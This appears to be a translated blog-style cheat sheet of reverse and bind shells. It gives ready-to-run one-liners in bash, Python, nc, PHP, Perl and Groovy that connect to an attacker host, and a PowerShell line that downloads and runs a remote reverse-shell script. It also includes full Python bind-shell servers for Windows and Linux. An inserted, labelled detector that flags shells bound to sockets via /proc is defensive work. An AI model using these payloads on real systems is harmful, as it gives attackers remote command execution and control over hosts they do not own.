Summary of various reverse shells


Reverse shell with the bash built into Linux

On the attacking machine, run

nc -lvvp 12345 to listen on the port

On the target machine, run bash -i >& /dev/tcp/ATTACKER_IP/12345 0>&1

A slightly more elaborate variant keeps the socket on a spare file descriptor: exec 5<>/dev/tcp/ATTACKER_IP/12345;cat <&5|while read line;do $line >&5 2>&1;done

Python reverse shell

With the attacking machine still listening, run on the target machine

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

For now this one only supports Linux.

Reverse shell with nc

When nc was built with the -e option,

use nc ATTACKER_IP 4444 -t -e /bin/bash

Now a few words about forward-connect (bind) shells.

A bind shell written by 郁離歌 (Windows version):

import subprocess
import threading
from socket import socket, AF_INET, SOCK_STREAM  # missing in the original; socket() is used unqualified below

def send(talk, proc):
    # Relay the child's output line by line to the connected client.
    while True:
        msg = proc.stdout.readline()
        talk.send(msg)

if __name__ == "__main__":
    server = socket(AF_INET, SOCK_STREAM)
    server.bind(('0.0.0.0', 11))
    server.listen(5)
    print('waiting for connect')
    talk, addr = server.accept()
    print('connect from', addr)
    # stderr is merged into stdout: a separate stderr pipe that nobody reads would fill up and block cmd.exe
    proc = subprocess.Popen('cmd.exe /K', stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
    t = threading.Thread(target=send, args=(talk, proc))
    t.daemon = True
    t.start()
    while True:
        cmd = talk.recv(1024)
        if not cmd:  # client disconnected
            break
        proc.stdin.write(cmd)
        proc.stdin.flush()
    server.close()

Linux version

import subprocess
from socket import socket, AF_INET, SOCK_STREAM  # missing in the original

if __name__ == "__main__":
    server = socket(AF_INET, SOCK_STREAM)
    server.bind(('0.0.0.0', 11))
    server.listen(5)
    print('waiting for connect')
    talk, addr = server.accept()
    print('connect from', addr)
    # The accepted socket becomes the shell's stdin/stdout/stderr directly.
    # shell=True was dropped: with a list argument it would run only "/bin/sh" and lose the "-i".
    proc = subprocess.Popen(["/bin/sh", "-i"], stdin=talk, stdout=talk, stderr=talk)
    proc.wait()
    talk.close()
    server.close()
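Whether the connection is reverse (bash /dev/tcp, the python dup2 one-liner, nc -e, and the php/perl variants below) or a bind shell like the one just shown, the end state on a Linux target is the same: an interactive shell whose file descriptors 0/1/2 are a TCP socket. That state is visible in /proc/<pid>/fd, so a single host check covers every variant. The following detector is an added example, not code from the original post; the process names it treats as shells, the severity labels and the sample /proc data are this example's own assumptions.

```python
"""Detect a shell whose standard streams are bound to a socket (Linux /proc).

Reverse shell or bind shell, the end state on the target is the same: an
interactive shell (/bin/sh -i, /bin/bash -i) whose fds 0/1/2 are a TCP socket,
set up with dup2() or with bash's /dev/tcp redirection. That state shows up in
/proc/<pid>/fd, so one check covers every variant listed on this page.
"""
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}   # assumed list: shells we expect on a pty, not a socket
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")   # readlink(/proc/<pid>/fd/N) form for a socket


def classify(comm, fd_targets):
    """Return (severity, reason) for one process, or None if it looks benign.

    comm       -- contents of /proc/<pid>/comm (process name)
    fd_targets -- {fd number: readlink target}, e.g. {0: "socket:[98765]"}
    """
    if comm not in SHELLS:
        return None
    socket_fds = sorted(fd for fd, target in fd_targets.items() if SOCKET_LINK.match(target))
    if not socket_fds:
        return None
    stdio = {0, 1, 2}
    if stdio <= set(socket_fds) and len({fd_targets[fd] for fd in stdio}) == 1:
        # bash -i >& /dev/tcp/..., nc -e, python dup2, php/perl exec and the bind shell all land here
        return ("high", "shell stdin/stdout/stderr all on %s" % fd_targets[0])
    # the 'exec 5<>/dev/tcp/...' read loop keeps the socket on a spare fd instead
    return ("medium", "shell holds a socket on fd(s) %s" % socket_fds)


def scan_proc(proc_root="/proc"):
    """Walk a live /proc and return {pid: (severity, reason)}. Other users' fds need root."""
    findings = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "comm")) as f:
                comm = f.read().strip()
            fd_dir = os.path.join(proc_root, entry, "fd")
            fd_targets = {}
            for fd in os.listdir(fd_dir):
                try:
                    fd_targets[int(fd)] = os.readlink(os.path.join(fd_dir, fd))
                except OSError:
                    pass            # fd closed between listdir and readlink
        except OSError:
            continue                # process exited or permission denied
        finding = classify(comm, fd_targets)
        if finding:
            findings[int(entry)] = finding
    return findings


# Constructed sample of /proc/<pid>/{comm,fd} for four processes (not real data).
SAMPLE_PROCESSES = {
    4242: ("bash", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]", 255: "/dev/pts/0"}),
    4250: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0", 5: "socket:[98766]"}),
    4300: ("bash", {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}),
    4400: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[11111]"}),
}


def scan_sample(processes=SAMPLE_PROCESSES):
    """Same logic as scan_proc, run over the constructed sample."""
    findings = {}
    for pid, (comm, fd_targets) in processes.items():
        finding = classify(comm, fd_targets)
        if finding:
            findings[pid] = finding
    return findings


if __name__ == "__main__":
    for pid, (severity, reason) in scan_sample().items():
        print("%s pid %d: %s" % (severity, pid, reason))
```

The Windows cmd.exe bind shell above is the one case this check does not see: cmd.exe is attached to pipes, and the socket stays with the python.exe parent. There the signal is a scripting interpreter holding a listening socket with a cmd.exe child, which is a process-tree question rather than an fd question.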

PHP reverse shell

php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl reverse shell

perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Java script reverse shell (the snippet is Groovy syntax, as the `as String[]` cast shows)

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

PowerShell reverse shell (360 will block it)

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444

This was summarized from a number of blog posts; there are certainly more techniques than these, to be added later.

